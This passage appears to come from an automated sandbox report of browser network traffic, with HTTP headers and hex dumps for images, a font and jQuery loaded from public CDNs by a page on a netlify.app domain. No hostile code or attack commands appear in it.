      2024-09-27 02:26:39 UTC4096INData Raw: c6 9d 61 ea 70 a0 a1 a1 61 8a 15 b3 ee 57 55 8f 4b 06 55 7d ac a3 63 75 cb 48 c9 35 5a 61 8c f1 84 23 53 e0 d9 ce f6 f6 1d 77 dc d5 b5 97 a0 9b 7c 65 a7 35 34 24 ca 5a ce 13 47 0e 4b 26 93 b7 30 73 c6 fe 4d 95 8d 31 b7 34 24 12 53 ca 69 db 0d 15 5c a7 aa 1e 5b 68 22 da db b1 66 e5 d5 95 ea a3 50 c4 e2 b1 f7 7a 14 06 0a 5b 1d e9 05 00 36 f4 43 f2 2e 99 32 93 29 d3 26 8d 2c 3b 29 3f 01 91 c7 18 9f d9 9c 9b 48 2c 1f 17 6e 1b 26 14 c1 5a fb f4 8e 2d 0a 3c 91 af 5c d0 9b bf 3f df 4b b2 42 c2 99 10 2d 32 71 73 cf 67 e7 cc 19 95 24 eb e7 75 0b 4e 62 63 ee b1 a1 ec 96 bb 10 92 e5 df 29 18 e4 c8 d3 ff 21 00 29 95 3b 4e fa 9f ff 2e 78 03 c0 b3 73 8e 9f a6 c4 a7 17 b2 3c 98 8b 78 85 11 2b 17 c1 7a e9 df ff fb 4f a3 da de e5 63 bd bd bb 44 b4 cb bd 01 21 8c f0 87 93
      Data Ascii: apaWUKU}cuH5Za#Sw|e54$ZGK&0sM14$Si\[h"fPz[6C.2)&,;)?H,n&Z-<\?KB-2qsg$uNbc)!);N.xs<x+zOcD!


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      12192.168.2.649722162.19.58.1614431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC604OUTGET /C1f1Y0C/logo-lps.png HTTP/1.1
      Host: i.ibb.co
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: image
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC379INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Content-Type: image/png
      Content-Length: 15795
      Connection: close
      Last-Modified: Sun, 27 Aug 2023 06:52:06 GMT
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Cache-Control: public
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, OPTIONS
      Accept-Ranges: bytes
      2024-09-27 02:26:39 UTC3717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 00 cb 08 03 00 00 00 af 53 91 74 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 03 00 50 4c 54 45 47 70 4c 60 60 62 60 60 62 f5 86 34 60 60 62 5f 5f 62 60 60 62 60 60 62 60 60 62 5f 5f 61 f5 86 34 f5 86 34 f5 86 34 63 63 64 61 61 63 f5 86 33 f5 86 34 5f 5f 61 60 60 62 60 60 62 60 60 62 5f 5f 61 5e 5e 61 60 60 62 f5 86 34 60 60 61 60 60 62 60 60 63 f6 86 34 5f 5f 61 60 60 62 60 60 61 60 60 62 60 60 62 60 60 62 5f 5f 61 60 60 62 5d 5d 5f 5f 5f 62 60 60 62 60 60 62 60 60 61 60 60 62 5f 5f 62 60 60 62 60 60 62 60 60 62 60 60 62 5f 5f 5f 5f 5f 62 f5 86 34 5e 5e 5f 60 60 62 60 60 62 60 60
      Data Ascii: PNGIHDRStgAMAasRGBpHYs.#.#x?vPLTEGpL``b``b4``b__b``b``b``b__a444ccdaac34__a``b``b``b__a^^a``b4``a``b``c4__a``b``a``b``b``b__a``b]]___b``b``b``a``b__b``b``b``b``b_____b4^^_``b``b``
      2024-09-27 02:26:39 UTC4096INData Raw: 9a 71 3f c4 00 06 0f ea 21 84 ad 88 7c 97 44 3a 05 d8 80 9f 5b 0f 80 85 42 c0 4c e9 67 7a a2 36 78 be 13 ee d3 2b 5b f7 95 46 eb 6e 5d 23 2a d0 e9 52 cc 76 76 5e b2 1a 94 3d 08 fa 24 1d d0 3d fc 94 f6 6c 34 ef 87 eb 3e 1c d6 4b 42 d1 45 b9 11 ec fc 73 70 46 21 79 07 0f e7 1b 0a 88 b9 48 27 c0 cf 9e 50 bb db c8 a9 a8 10 3e 01 13 10 56 f7 6a 7c 71 e6 24 15 73 53 6c d7 a2 dc bf e8 63 ff 7b 52 e9 ef 49 a6 2d 02 4d e1 2c bc 5a 2a 1c 23 69 f3 c8 81 ed c5 96 5a 19 e8 ab 51 d4 79 27 40 14 24 83 a9 a0 7f 0b 30 6b 40 57 cc 03 2f 93 73 f6 24 d9 8a 1b 24 e7 23 60 53 fe 0d b3 e7 a9 24 1b 5d ab b0 1a f0 7b 35 62 eb 75 e1 90 f6 f9 57 b1 cd 5e 10 cf a1 ef 99 a7 53 12 a2 ae c8 91 f2 71 a3 d8 86 0b df 84 80 75 41 9f 95 5c 77 a5 22 72 1b fa fb b9 57 6b a5 56 2d 21 e8 42 50
      Data Ascii: q?!|D:[BLgz6x+[Fn]#*Rvv^=$=l4>KBEspF!yH'P>Vj|q$sSlc{RI-M,Z*#iZQy'@$0k@W/s$$#`S$]{5buW^SquA\w"rWkV-!BP
      2024-09-27 02:26:39 UTC4096INData Raw: b9 9b e7 d3 a4 a9 c4 19 1d 3a a0 83 63 83 12 c0 8c 36 07 3a 30 02 35 e5 85 14 e4 a0 65 d0 81 35 ba 04 2f b6 9c 00 1c 6e 55 ba b2 00 7a 2b 52 46 df 2a c1 07 94 47 2e fc 84 4a f1 48 4c a4 8d 03 3a dc c2 c7 3d e8 a4 a5 62 9e 9d 0e e8 72 22 48 3f 14 04 85 48 0a a0 2f 3c 64 f8 ce bc 00 95 27 3e 2c 74 a0 cd 3d a0 4e 01 93 9b 1e 7b 8b a4 87 26 8e d6 3a ac dc 3f 9e d3 c4 5e 75 38 50 74 40 07 cf 2c 25 e9 e9 2b 03 1d d6 f4 3c d9 50 82 de 9c 32 08 7a 90 b5 bf c0 2a e8 28 b5 b0 96 b8 5b 10 32 96 52 46 ca d3 95 05 d0 4f 15 98 20 2b 19 bb 4c 84 1c a4 82 de 1e 78 08 e2 83 ee 86 fc e9 4a c6 2a 1b 61 5b 4a 2d e8 7f 4e 96 49 60 14 a8 fe ae 4f 1e 74 88 d5 4c 8b 03 ba 46 d2 87 bc fd 05 49 1b 8b 7b 08 ad 3a c7 dc 37 39 2d 8b f4 67 2a 51 8f 23 e9 7d cd 4a fa b5 24 e7 1c 8a ca
      Data Ascii: :c6:05e5/nUz+RF*G.JHL:=br"H?H/<d'>,t=N{&:?^u8Pt@,%+<P2z*([2RFO +LxJ*a[J-NI`OtLFI{:79-g*Q#}J$
      2024-09-27 02:26:39 UTC3886INData Raw: b0 31 28 07 f5 ff 94 66 30 d8 f7 c4 4e cc 81 54 59 3a 1f 43 cb a5 07 3a 9c d0 45 9e 6e ab 03 3a 14 ba 95 09 75 13 2a 3e 51 09 74 98 ec 7c 99 91 97 04 e8 29 fa fb 66 98 05 3d 69 de 50 2b da bd aa 02 53 08 67 13 d6 96 23 2f 02 1d 31 3e 1c 2d 84 c4 75 41 f7 4c f1 b0 f4 73 89 22 b2 37 7d e8 ee 4b d5 a0 43 bb 64 52 0c 54 91 85 85 85 f8 42 21 71 01 72 fb 0a b2 08 17 f9 94 da d0 73 50 48 cf 54 b0 45 0a a0 63 2a 2e 3f ac ad ec 52 3a a0 e7 50 42 0b de 79 ce 55 98 54 3d 58 6e b2 89 a0 3b 19 89 60 24 15 d0 1d 45 38 1c f1 46 28 75 d0 e3 b7 49 4d 17 e8 63 ab f1 51 dd 80 a5 46 a2 0f 2b e6 13 d1 97 f4 1e 53 10 8c 58 5a 2a 4d 7e a2 09 ed ad f0 f5 51 82 de 4c 12 af 08 ad 6a 02 12 11 d1 50 b7 09 a4 04 83 5b f0 98 77 37 42 8e 96 28 e9 54 09 cc 19 24 b1 51 ea 80 4e df 1d 20
      Data Ascii: 1(f0NTY:C:En:u*>Qt|)f=iP+Sg#/1>-uALs"7}KCdRTB!qrsPHTEc*.?R:PByUT=Xn;`$E8F(uIMcQF+SXZ*M~QLjP[w7B(T$QN


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      13192.168.2.649733151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:41 UTC668OUTGET /npm/slick-carousel@1.8.1/slick/ajax-loader.gif HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: image
      Referer: https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:41 UTC746INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 4178
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: image/gif
      X-JSD-Version: 1.8.1
      X-JSD-Version-Type: version
      ETag: W/"1052-ehqkNhQ5Y4K7FeX95XTZzc0haY8"
      Accept-Ranges: bytes
      Age: 1716147
      Date: Fri, 27 Sep 2024 02:26:41 GMT
      X-Served-By: cache-fra-etou8220104-FRA, cache-nyc-kteb1890096-NYC
      X-Cache: HIT, HIT
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:41 UTC1378INData Raw: 47 49 46 38 39 61 20 00 20 00 f5 00 00 ff ff ff 00 00 00 fa fa fa c4 c4 c4 e8 e8 e8 f0 f0 f0 d0 d0 d0 7e 7e 7e 9a 9a 9a f6 f6 f6 e6 e6 e6 fc fc fc 92 92 92 86 86 86 e2 e2 e2 b8 b8 b8 a0 a0 a0 ec ec ec ae ae ae dc dc dc 3e 3e 3e 56 56 56 60 60 60 7c 7c 7c a8 a8 a8 ee ee ee 4a 4a 4a 6c 6c 6c 0c 0c 0c 00 00 00 ce ce ce c8 c8 c8 d8 d8 d8 2c 2c 2c 5e 5e 5e 1e 1e 1e 4c 4c 4c b0 b0 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 fe 1a 43 72 65 61 74 65 64 20 77 69 74 68 20 61 6a 61 78 6c 6f 61 64 2e 69 6e 66 6f 00 21 f9 04 00 0a 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32
      Data Ascii: GIF89a ~~~>>>VVV```|||JJJlll,,,^^^LLL!Created with ajaxload.info!!NETSCAPE2
      2024-09-27 02:26:41 UTC1378INData Raw: af 14 1b 63 b4 7e 86 09 0d bf 15 61 56 b4 6a 55 17 af 1a 10 7f 55 a6 66 7b 13 14 0d 04 86 00 89 86 b1 4c 0b 91 e3 91 de 7b 5b 48 e9 0e c3 c3 b8 55 03 1d f1 f2 1d 1c ec b4 d3 7b f0 f3 f1 1c e2 e4 e5 dc 1c a4 1b a8 69 89 39 38 07 e1 5c 71 b7 84 0c be 2a 02 e4 80 da 33 ab 0c c3 6e 05 98 25 0c 97 b1 4c 06 5c a3 40 e9 f9 d8 30 83 b7 88 f7 88 a4 1c 32 aa 54 82 04 a5 2a 11 09 39 13 a6 11 99 7d 94 74 04 f9 90 49 c7 2a 44 39 85 78 e4 36 a4 cf b4 a0 00 46 5d 6c 22 b1 a8 c5 21 4d b9 21 05 30 d5 a8 54 2c 44 a6 2a b2 46 54 18 d7 ae 70 10 71 0b 02 00 21 f9 04 00 0a 00 04 00 2c 00 00 00 00 20 00 20 00 00 06 ff 40 80 70 48 2c 2a 14 8b a2 72 49 4c 12 05 47 41 b1 c0 5c 26 14 99 67 94 08 1a 4c aa 45 a8 42 2a 14 93 01 85 c1 00 04 2e 46 8e 43 f3 d0 a3 76 b6 cb c7 04 7e 2c 24
      Data Ascii: c~aVjUUf{L{[HU{i98\q*3n%L\@02T*9}tI*D9x6F]l"!M!0T,D*FTpq!, @pH,*rILGA\&gLEB*.FCv~,$
      2024-09-27 02:26:41 UTC1378INData Raw: c1 00 01 08 10 08 14 38 70 a0 04 11 07 f5 88 34 ea e5 80 21 05 00 06 28 50 30 00 a0 04 45 07 4d 1c 28 50 43 81 21 ca 90 23 cf 34 38 80 e0 9b 90 01 0c 0f 08 81 49 12 c0 00 32 8a 3d 7f 8d e8 c0 01 13 cf 21 0c 0e 34 10 a7 04 02 43 08 43 8e 0a 71 40 f1 c3 af 12 1d 42 10 91 2a 04 c2 01 10 36 8b 70 0d cb 24 81 06 0d ef f4 04 01 00 21 f9 04 00 0a 00 08 00 2c 00 00 00 00 20 00 20 00 00 06 ff 40 80 70 48 2c 2a 14 8b a2 72 49 4c 12 05 47 41 51 ca 54 26 14 99 67 94 58 50 24 aa d3 ad 10 aa a0 02 c8 05 70 31 72 1c 92 cd 99 b6 5a eb 1d 8b c9 df 39 f7 98 7c 0b 8f 11 6a 02 66 42 0b 47 69 7e 57 65 45 09 79 00 86 0a 11 84 8a 7d 52 90 69 6e 6c 48 43 71 87 4e 00 05 84 85 19 4e 0b 5d 87 61 47 75 7a a7 91 a2 43 8a 0a 98 60 ad 8e 4c a6 8b 6a 86 05 9f ba 7a 8f b7 83 c2 83 bd 82
      Data Ascii: 8p4!(P0EM(PC!#48I2=!4CCq@B*6p$!, @pH,*rILGAQT&gXP$p1rZ9|jfBGi~WeEy}RinlHCqNN]aGuzC`Ljz
      2024-09-27 02:26:41 UTC44INData Raw: 2a 61 c4 b3 8a 27 54 35 55 9b 2a 9d a4 06 cd 47 87 0a 4e 3a 8d 4a 8b 6c d3 b1 23 cf 32 61 d5 2d 08 00 3b 00 00 00 00 00 00 00 00 00
      Data Ascii: *a'T5U*GN:Jl#2a-;


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      14192.168.2.649734151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:41 UTC654OUTGET /npm/slick-carousel@1.8.1/slick/fonts/slick.woff HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      Origin: https://pengajuan-kartufisik.netlify.app
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: */*
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: font
      Referer: https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:41 UTC745INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 1380
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: font/woff
      X-JSD-Version: 1.8.1
      X-JSD-Version-Type: version
      ETag: W/"564-r5HBLw9Aak+AGus7OYdo/kHY+GQ"
      Accept-Ranges: bytes
      Age: 2637709
      Date: Fri, 27 Sep 2024 02:26:41 GMT
      X-Served-By: cache-fra-etou8220033-FRA, cache-ewr-kewr1740071-EWR
      X-Cache: HIT, HIT
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:41 UTC1378INData Raw: 77 4f 46 46 4f 54 54 4f 00 00 05 64 00 0b 00 00 00 00 07 5c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 46 46 20 00 00 01 08 00 00 02 2e 00 00 02 9b 1f fa 56 0e 46 46 54 4d 00 00 03 38 00 00 00 1a 00 00 00 1c 6d d1 c8 af 47 44 45 46 00 00 03 54 00 00 00 1c 00 00 00 20 00 32 00 04 4f 53 2f 32 00 00 03 70 00 00 00 52 00 00 00 60 50 18 ff ae 63 6d 61 70 00 00 03 c4 00 00 00 50 00 00 01 62 22 0b 44 b0 68 65 61 64 00 00 04 14 00 00 00 2e 00 00 00 36 00 01 31 fb 68 68 65 61 00 00 04 44 00 00 00 1c 00 00 00 24 03 e5 02 03 68 6d 74 78 00 00 04 60 00 00 00 0e 00 00 00 0e 04 4a 00 4a 6d 61 78 70 00 00 04 70 00 00 00 06 00 00 00 06 00 05 50 00 6e 61 6d 65 00 00 04 78 00 00 00 dc 00 00 01 6e 05 27 81 c2 70 6f 73 74 00 00 05 54 00 00 00
      Data Ascii: wOFFOTTOd\CFF .VFFTM8mGDEFT 2OS/2pR`PcmapPb"Dhead.61hheaD$hmtx`JJmaxppPnamexn'postT
      2024-09-27 02:26:41 UTC2INData Raw: 00 05
      Data Ascii:


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      15192.168.2.649735184.28.90.27443
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:42 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: identity
      User-Agent: Microsoft BITS/7.8
      Host: fs.microsoft.com
      2024-09-27 02:26:42 UTC466INHTTP/1.1 200 OK
      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
      Content-Type: application/octet-stream
      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
      Server: ECAcc (lpl/EF70)
      X-CID: 11
      X-Ms-ApiVersion: Distribute 1.2
      X-Ms-Region: prod-weu-z1
      Cache-Control: public, max-age=51554
      Date: Fri, 27 Sep 2024 02:26:42 GMT
      Connection: close
      X-CID: 2


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      16192.168.2.649737104.17.24.144431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:43 UTC380OUTGET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1
      Host: cdnjs.cloudflare.com
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:43 UTC929INHTTP/1.1 200 OK
      Date: Fri, 27 Sep 2024 02:26:43 GMT
      Content-Type: application/javascript; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Access-Control-Allow-Origin: *
      Cache-Control: public, max-age=30672000
      ETag: W/"5eb09ed3-15d84"
      Last-Modified: Mon, 04 May 2020 23:01:39 GMT
      cf-cdnjs-via: cfworker/kv
      Cross-Origin-Resource-Policy: cross-origin
      Timing-Allow-Origin: *
      X-Content-Type-Options: nosniff
      CF-Cache-Status: HIT
      Age: 589100
      Expires: Wed, 17 Sep 2025 02:26:43 GMT
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NbiSlFbJDMeLTGVwxM1LVHooz7MRUCysaHthMd%2FU6U3wFZ4XUKyeeVIQyX5FsHUU7p3FSg3zwuQnnwJmbWI033pv5689NnqK%2BGeXmwf1qThCaupbOX%2FfAAYGz6Wv64EQwHXE4P1w"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=15780000
      Server: cloudflare
      CF-RAY: 8c980cec2d050f53-EWR
      2024-09-27 02:26:43 UTC440INData Raw: 37 62 66 64 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a
      Data Ascii: 7bfd/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
      2024-09-27 02:26:43 UTC1369INData Raw: 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20
      Data Ascii: on(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return
      2024-09-27 02:26:43 UTC1369INData Raw: 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73
      Data Ascii: s.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this
      2024-09-27 02:26:43 UTC1369INData Raw: 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3d 69 2c 65 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f
      Data Ascii: n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:functio
      2024-09-27 02:26:43 UTC1369INData Raw: 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4d 2b 22 2b 24 22 2c 22 67 22 29 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2a 2c 22 2b 4d 2b 22 2a 22 29 2c 7a 3d 6e
      Data Ascii: |("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=n
